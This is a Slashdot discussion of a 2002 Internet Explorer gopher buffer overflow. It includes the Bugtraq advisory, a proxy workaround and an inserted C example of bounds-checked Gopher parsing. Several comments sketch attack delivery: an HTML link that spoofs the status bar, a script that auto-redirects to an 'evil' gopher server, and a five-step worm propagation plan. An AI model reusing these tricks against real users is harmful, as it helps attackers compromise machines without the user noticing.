Latest IE Hole Lets Gopher Root You
rvaniwaa writes "Another hole in Internet Explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected, and a Microsoft spokesman stated that the company is 'moving forward on the investigation with all due speed'."
Let the "gopher hole" jokes begin.
"hostile Gopher site"? Ouch ... I think I shall wear kevlar underpants while using IE in future.
From the article:
In January, Microsoft Chairman Bill Gates instructed employees to make software security a top priority.
Yeah, looks like everything's moving full steam ahead on that front.
----
One of us needs to stick one's head in a bucket of ice water.
- Hobbes
"Where do you want to gopher today?"
"I smell varmint poontang, and the only good varmint poontang is dead varmint poontang, I think."
I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disguising their gopher links to look like regular hrefs?
Well you can't expect Microsoft to keep up with all these new technologies and formats!
--
Don't sweat the petty things, and don't pet the sweaty things.
To protect against potential exploitation, you can temporarily disable the gopher protocol like this:
Go to Tools -> Internet options -> Connections. Click on "LAN settings".
Check "Use a proxy server for your LAN". Click on "Advanced...".
Go to the Gopher text field
and enter "localhost", and "1" in the port field. This will stop Internet
Explorer from showing and processing any gopher pages.
This will protect you for now, at least until M$ pull their finger out.
Has anyone ever tried to compile stats on security holes in browsers? What I'd like to see is a comparison of browsers in this case, with each version listed with the various vulnerabilities found? Obviously, IE is going to come out on top here, but I'd be interested to see such a list anyway. I've looked around the SANS site and didn't see anything like that. I'd even settle for a short summary. Something like IE has X amount of holes, Netscape has Y amount of holes, Opera has Z amount, and so on.
Life is hard, and the world is cruel
Funny you should mention a resurgence. I just found this manifesto of people wanting to revive gopher.
http://www.scn.org/~bkarger/gopher-manifesto
I've got a mind like a steel trap - it's got an animal's foot stuck in it.
That really isn't the point. It would not take many minutes to put up a gopher server with a Win 32 rootkit as content, and then put an innocent but interesting looking link into a web page ('free live world cup scores' would do nicely just now) with an href pointing to that server, and, ideally, one of those annoying JavaScript scrollers in the browser status display to prevent the user from noticing they're about to click a gopher link, and, hey! That's a few more suckers rooted. It will probably go through most firewalls, too.
If you (or your organisation) still use Internet Explorer, I would treat this as serious. Change your default IE install to have gopher point to a safe machine of your own; block gopher at your firewall; and, ideally, switch to Opera 6, Netscape 6, or Mozilla as your organisation's default browser.
This isn't going to be the last security hole found in IE.
I'm old enough to remember when discussions on Slashdot were well informed.
The Official Bugtraq Post:
OVERVIEW
========
Gopher is a protocol developed at the University of Minnesota in the
early 1990's. Gopher servers offer hierarchically organized directories
and files. These form a "gopherspace" which can be thought of as the
predecessor of the World Wide Web. Gopher was mostly abandoned soon after
HTTP and the World Wide Web started gaining popularity.
Microsoft Internet Explorer has a built-in gopher client. Gopher pages can
be accessed via URLs starting with "gopher://". The part of code in IE
which parses gopher replies contains an exploitable buffer overflow
bug. A malicious server may be used to run arbitrary code on an IE user's
system.
DETAILS
=======
When the overflow is triggered, a fixed sized buffer in stack gets
overwritten with data from the gopher server. This data can contain most
octets from 0 to 255 (also nulls) which makes it particularly easy to
inject a working shellcode in it. This is a traditional, trivially
exploitable buffer overflow. A test exploit has been successfully used to
run arbitrary code without user intervention with various IE versions and
systems including IE 5.5 and 6.0.
The attack can be launched via a web page or an HTML mail message which
redirect the user to a malicious gopher server when the victim views them.
The server can be very minimal, i.e. a program that can listen on a TCP
port and write a block of data; a fully operational gopher server isn't
necessary in order to carry out the attack.
The exploiter could do anything that a regular user could do on the
system: retrieve, install, or remove files, upload and run programs, etc.
Full technical details aren't disclosed at this time to prevent
exploitation.
WORKAROUND
==========
Internet Explorer users can protect themselves from the flaw by disabling
the gopher protocol. Barely any gopher servers exist on the Internet
today, so this is unlikely to cause problems. If needed, a gopher client
or some other web browser can be used to access the gopherspace.
An easy way to disable processing and displaying gopher pages is to define
a non-functional gopher proxy in Internet Options. Select Tools ->
Internet options -> Connections. Click on "LAN settings". Check "Use a
proxy server for your LAN". Click on "Advanced...". Here you can define
proxy servers to be used with different protocols. Go to the Gopher text
field and enter "localhost", and "1" in the port text field. This will
stop Internet Explorer from fetching any gopher documents.
After installing the patch from Microsoft you can remove these gopher
proxy settings (or restore them to values they had before).
For more information and a vulnerability test see
http://www.solutions.fi
VENDOR STATUS
=============
Microsoft was contacted on May 20th. At the moment of writing this
advisory, Microsoft has started designing and coding a fix, but hasn't
given any approximation of when it would be released. The patch will be
available at
http://www.microsoft.com/technet/security/current
when it is completed.
I'll have something intelligent to add one of these days...
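The advisory above describes the bug only as a fixed-size stack buffer overwritten with reply data from the gopher server. The following is an added example, not code from the advisory, from IE, or from the poster, that shows the pattern in question and the bounds check that prevents it. It parses one Gopher menu line in the RFC 1436 layout (type character, display string, selector, host and port separated by tabs, CRLF-terminated). The 64-byte field size, the struct, and the sample reply lines are this example's own assumptions and say nothing about the real sizes inside IE.

```c
/*
 * Added example: bounds-checked parsing of a Gopher menu line, next to the
 * unsafe pattern the advisory describes. Not IE's code; all sizes and sample
 * lines are assumptions made for the example.
 *
 * RFC 1436 menu line:  <type><display string>\t<selector>\t<host>\t<port>\r\n
 */
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 64   /* assumed per-field buffer size, not IE's real size */

struct gopher_item {
    char type;                 /* '0' text file, '1' directory, ... */
    char display[FIELD_MAX];
    char selector[FIELD_MAX];
    char host[FIELD_MAX];
    int  port;
};

/*
 * UNSAFE PATTERN (shown for contrast, never called in this file):
 *
 *   static void store_display_unsafe(const char *field)
 *   {
 *       char display[FIELD_MAX];
 *       strcpy(display, field);   // no length check: a server-supplied
 *   }                             // field longer than 63 bytes runs past
 *                                 // the buffer into the saved return address
 */

/* Copy src[0..len) into dst as a NUL-terminated string; refuse if it does not fit. */
static int copy_field(char *dst, size_t dst_size, const char *src, size_t len)
{
    if (len >= dst_size)        /* one byte must remain for the terminator */
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Parse one menu line. Returns 0 on success, -1 on malformed or oversized input. */
int parse_gopher_line(const char *line, struct gopher_item *item)
{
    char *dsts[3] = { item->display, item->selector, item->host };
    char portbuf[8];
    const char *p = line;
    size_t n;
    int i, port = 0;

    if (line == NULL || *p == '\0' || *p == '\t' || *p == '\r' || *p == '\n')
        return -1;
    item->type = *p++;

    /* three tab-terminated fields: display string, selector, host */
    for (i = 0; i < 3; i++) {
        n = strcspn(p, "\t\r\n");
        if (p[n] != '\t')
            return -1;                          /* field missing, line ended early */
        if (copy_field(dsts[i], FIELD_MAX, p, n) < 0)
            return -1;                          /* oversized: the overflow case */
        p += n + 1;
    }

    /* port: decimal digits up to the line end (or a Gopher+ tab) */
    n = strcspn(p, "\t\r\n");
    if (n == 0 || copy_field(portbuf, sizeof portbuf, p, n) < 0)
        return -1;
    for (i = 0; portbuf[i] != '\0'; i++) {
        if (portbuf[i] < '0' || portbuf[i] > '9')
            return -1;
        port = port * 10 + (portbuf[i] - '0');
        if (port > 65535)
            return -1;
    }
    item->port = port;
    return 0;
}

/* Constructed sample reply lines (not captured from any real server). */
static const char LINE_OK[]        = "1About this server\t/about\tgopher.example.org\t70\r\n";
static const char LINE_BAD_PORT[]  = "0README\t/README\tgopher.example.org\t99999\r\n";
static const char LINE_TRUNCATED[] = "0README\t/README\r\n";

int demo_ok_port(void)
{
    struct gopher_item it;
    return parse_gopher_line(LINE_OK, &it) == 0 ? it.port : -1;   /* 70 */
}

int demo_bad_port(void)  { struct gopher_item it; return parse_gopher_line(LINE_BAD_PORT, &it); }
int demo_truncated(void) { struct gopher_item it; return parse_gopher_line(LINE_TRUNCATED, &it); }

/* A hostile reply: a 199-byte display string, the kind of input that would
 * overrun a 64-byte stack buffer under the unsafe pattern above. */
int demo_oversized_display(void)
{
    char line[256];
    struct gopher_item it;
    memset(line, 'A', sizeof line);
    line[0] = '1';
    snprintf(line + 200, sizeof line - 200, "\t/x\tevil.example\t70\r\n");
    return parse_gopher_line(line, &it);       /* -1: rejected before any copy */
}

int main(void)
{
    printf("well-formed line: port=%d\n", demo_ok_port());
    printf("oversized display rejected: %d\n", demo_oversized_display());
    printf("bad port rejected: %d\n", demo_bad_port());
    printf("truncated line rejected: %d\n", demo_truncated());
    return 0;
}
```

The point of the example is the one sentence in the advisory about server-controlled data landing in a fixed-size stack buffer: the parser's only defence is to measure each field before it is copied and to treat an oversized field as a protocol error rather than something to truncate or tolerate. Rejecting the whole line, instead of silently clipping it, also keeps a hostile server from steering which bytes end up in the buffer.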
However, a quick search turns up several still-active gophers, for example:
gopher://gopher.umsl.edu/
gopher://gopher.cac.psu.edu/
(These actually return data -- some others I found the server up but no data returned).
As to why gopher died out, Tim Berners-Lee offers the following:
(from his book, Weaving the Web)
-- Alastair
Obligatory reference to story posted earlier today...
'Think Tank' Issues Microsoft-Funded Troll
According to this ZDNet article, a Washington think tank known as the Alexis de Tocqueville Institution is soon to release a study stating that Open Source Software allows terrorists an easy time hacking into our systems. It's little surprise that this group takes money from Microsoft. The Register's story is good too. All the whoring reports in the world won't make open source any less secure.
Everybody knows terrorists love to target Mozilla users by sending them links which cause their system to email Star Office attachments to everybody with payloads that will delete all your OGGs and PNGs by exploiting security holes in Sendmail.
"Communism is like having one [local] phone company " - Lenny Bruce
That's not the point.
if you make a link to a gopher site in an html page, the average MS surfer will not hesitate to click on it.
which is what the web was supposed to do, make it transparent.
... hi bingo
nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.
https://www.gnu.org/philosophy/free-sw.html
certainly more applicable to the concept of fixing security holes in Microsoft software.
FYI: Whack-a-Mole is an old arcade game where you hold a padded mallet facing a slightly inclined surface with a half-dozen or so holes. Periodically a little mole pops up from a hole, and you try to whack him before he goes back down on his own. A little bit like playing XBill, only in the Real World.
The living have better things to do than to continue hating the dead.
Exactly.. it wouldn't take long for a page that says Download the UT 2003 demo to nuke a bunch of computers. (Where's the demo anyway, dammit, I'm dying to play!)
As I pointed out yesterday, there's more info about the bug and its prevention available from Oy Solutions, who found the exploit.
Why does a user need to click on the link? Why not just use a javascript location.href= or whatever to automatically load the link? It's my understanding that Yahoo Profiles still lets you embed javascript in a picture URL. What's to stop someone from creating an automated attack and then getting chatters to check your profile? The possibilites seem endless.
A Microsoft spokesman who refused to be identified said Tuesday that the company is "moving forward on the investigation with all due speed" and will take the action that best serves its customers.
Since when did M$ start offering downloads of Mozilla?
I stole this Sig
<a href="gopher://hostile-link" onmouseover="window.status='http://www.friendlysite.com'; return true">click here!</a>
Now my javascript is rusty and I have not tried this ... but you get the idea.
First of all, it's a URL buffer overflow; a gopher link isn't needed.
All that's needed is for someone to disguise an "evil" link, and whammo - you've got r00t.
Big big big remote exploit.
... hi bingo
That's what sucks about Windows: you can't say that you rooted someone. Saying "I ADMINISTRATORED YOU!" just doesn't sound cool.
Hacker Media
Microsoft: Now with more exploited holes than a two-dollar hooker.
--
I Hit the Karma Cap, and All I Got Was This Lousy
I wish it was that simple. There are hordes of people out there who have jobs where if they install anything on their work computer they will get in trouble.
I am one of these people. I have no choice but to use MSIE and Outlook on NT at work.
I feel so dirty.
And thus the previous comments about blocking gopher are important to many.
And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?
So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.
So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?
Nope, no sig
gopher://gopher.URr00t3d.ru
"I don't know half of you half as well as I should like, and I like less than half of you half as well as you deserve."
Just because nobody uses something legitimately, it doesn't mean that nobody will use it maliciously.
The best thing about Windows?
It forced me to learn to spell 'administrator.'
Kinda like how FTP forced me to learn to spell 'anonymous.'
Or something.
Moneyed corporations, non-working 'poor' and criminal prisoners are turning productive citizens into tax-slaves.
$5 / month hosted VPS on linux = awesome!
...why do they have to find and fix them one by one? Can't they switch to a programming language, or debugging tool, or run-time library, that would find and fix all of them?
Indeed, about the time Windows 2000 was released with 65536 known bugs (or whatever the exact number was), didn't Jim Allchin say that they had such a tool and were using it?
Should buffer overflows be as outdated as Gopher itself?
"How to Do Nothing," kids activities, back in print!
most important of these is that gopher is absolutely archaic.
<script>
document.location.replace("gopher://evil.gopherserver.com:7000/buffer_overflow/");
</script>
:-)
Second, as always, Microsoft will have a patch out fairly quickly, which is more than can be said for Mozilla half of the time...
I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"...
Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?
Gerv
Perhaps so, but avoiding buffer overflows isn't rocket science. It's a simple matter of bounds checking. There's really no excuse.
I don't care if it's 90,000 hectares. That lake was not my doing.
Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malicious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.
A smart worm could:
1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
2. Open up a dummy gopher port which responds to all requests with the exploit.
3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
4. The worm installs itself on all client machines that click the gopher links and begins scanning for vulnerable servers.
5. Goto 1.
None of this has anything to do with the number gopher servers left on the Internet.
-josh
What's worse? Saying "Don't use IE!" as a blatant attempt at karma whoring, or that some idiot moderators modded that up.
Logic check: "Don't use the browser that most websites are designed for!"
Do you really think I'd be using IE right now if Opera was cutting it?
"Derp de derp."
I found it humorous that in the "Special Offers" box there was an ad/link that read: "Access Your PC from Anywhere - Free Download"
The problem is that with only 32-bit addressing it's impossible to programmatically store all of the bugs in Microsoft's software.
The global economy is a great thing until you feel it locally.
They don't care.
Yeah, they made some PR stunts concerning security, but until stuff like this starts affecting their bottom line, they won't care.
There are just too many morons out there buying their stuff, so the situation won't change anytime soon.
And don't give me that crap about being forced into using it. No one is going to hold a gun against your head and say: use Explorer or die.
If your employer makes you use stuff you hate, then you're just a lame pushover and you deserve what you get.
Click here to download it.
my other penis is a vagina
You mean you haven't found it yet? It's right here!
karma capped
You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?
sPh
Considering that the browser components are supposedly scattered through many DLLs, any patches from M$ could easily include updates for Digital Rights Management lockdown, spyware to tell tales, etc, as well as the 'next big hole' that someone will 'discover' whenever MS feels the need to send out more tracking/spying/crippling patches.
Heck, they don't even need to include such stuff, just track who downloads the latest patch and correlate with previous data to build a picture of what's out there.
For example, say ten million distinct folks download the latest patch for Win98. If M$ *know* they've only sold eight million copies of Win98, they know there are 2 million BSA targets out there...